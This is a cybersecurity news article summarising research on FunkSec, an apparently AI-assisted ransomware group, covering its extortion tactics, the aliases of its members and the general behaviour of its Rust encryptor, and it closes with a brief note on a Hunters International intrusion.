Cybersecurity researchers have shed light on a nascent artificial intelligence (AI) assisted ransomware family called FunkSec that sprang forth in late 2024, and has claimed more than 85 victims to date.
“The group uses double extortion tactics, combining data theft with encryption to pressure victims into paying ransoms,” Check Point Research said in a new report shared with The Hacker News. “Notably, FunkSec demanded unusually low ransoms, sometimes as little as $10,000, and sold stolen data to third parties at reduced prices.”
FunkSec launched its data leak site (DLS) in December 2024 to “centralize” their ransomware operations, highlighting breach announcements, a custom tool to conduct distributed denial-of-service (DDoS) attacks, and a bespoke ransomware as part of a ransomware-as-a-service (RaaS) model.
A majority of the victims are located in the U.S., India, Italy, Brazil, Israel, Spain, and Mongolia. Check Point’s analysis of the group’s activity has revealed that it may be the likely work of novice actors who are seeking to attract notoriety by recycling the leaked information from previous hacktivist-related leaks.
According to Halcyon, FunkSec is notable for the fact that it functions both as a ransomware group and data broker, peddling stolen data to interested buyers for $1,000 to $5,000.
It has been determined that some members of the RaaS group engaged in hacktivist activities, underscoring a continued blurring of boundaries between hacktivism and cybercrime, just as nation-state actors and organized cybercriminals are increasingly exhibiting an “unsettling convergence of tactics, techniques, and even objectives.”
They also claim to target India and the U.S., aligning themselves with the “Free Palestine” movement and attempting to associate with now-defunct hacktivist entities like Ghost Algeria and Cyb3r Fl00d. Some of the prominent actors associated with FunkSec are listed below –
- A suspected Algeria-based actor named Scorpion (aka DesertStorm) who has promoted the group on underground forums such as Breached Forum
- El_farado, who emerged as a main figure advertising FunkSec after DesertStorm’s ban from Breached Forum
- XTN, a likely associate who is involved in an as-yet-unknown “data-sorting” service
- Blako, who has been tagged by DesertStorm along with El_farado
- Bjorka, a known Indonesian hacktivist whose alias has been used to claim leaks attributed to FunkSec on DarkForums, either pointing to a loose affiliation or their attempts to impersonate FunkSec
The possibility that the group may also be dabbling in hacktivist activity is evidenced by the presence of DDoS attack tools, as well as those related to remote desktop management (JQRAXY_HVNC) and password generation (funkgenerate).
“The development of the group’s tools, including the encryptor, was likely AI-assisted, which may have contributed to their rapid iteration despite the author’s apparent lack of technical expertise,” Check Point pointed out.
The latest version of the ransomware, named FunkSec V1.5, is written in Rust, with the artifact uploaded to the VirusTotal platform from Algeria. An examination of older versions of the malware reveals references to FunkLocker and Ghost Algeria in the ransomware notes. Most of these specimens were uploaded from Algeria and possibly by the developer themselves, suggesting that the threat actor is from the country.
The ransomware binary is configured to recursively iterate over all directories and encrypt the targeted files, but not before elevating privileges and taking steps to disable security controls, delete shadow copy backups, and terminate a hard-coded list of processes and services.
“2024 was a very successful year for ransomware groups, while in parallel, the global conflicts also fueled the activity of different hacktivist group,” Sergey Shykevich, threat intelligence group manager at Check Point Research, said in a statement.
“FunkSec, a new group that emerged lately as the most active ransomware group in December, blurs the lines between hacktivism and cybercrime. Driven by both political agendas and financial incentives, FunkSec leverages AI and repurposes old data leaks to establish a new ransomware brand, though real success of their activities remains highly questionable.”
The development comes as Forescout detailed a Hunters International attack that likely leveraged Oracle WebLogic Server as an initial entry point to drop a China Chopper web shell, which was then used to perform a series of post-exploitation activities that ultimately led to the deployment of the ransomware.
“After gaining access, the attackers conducted reconnaissance and lateral movement to map the network and escalate privileges,” Forescout said. “The attackers used a variety of common administrative and red teaming tools for lateral movement.”
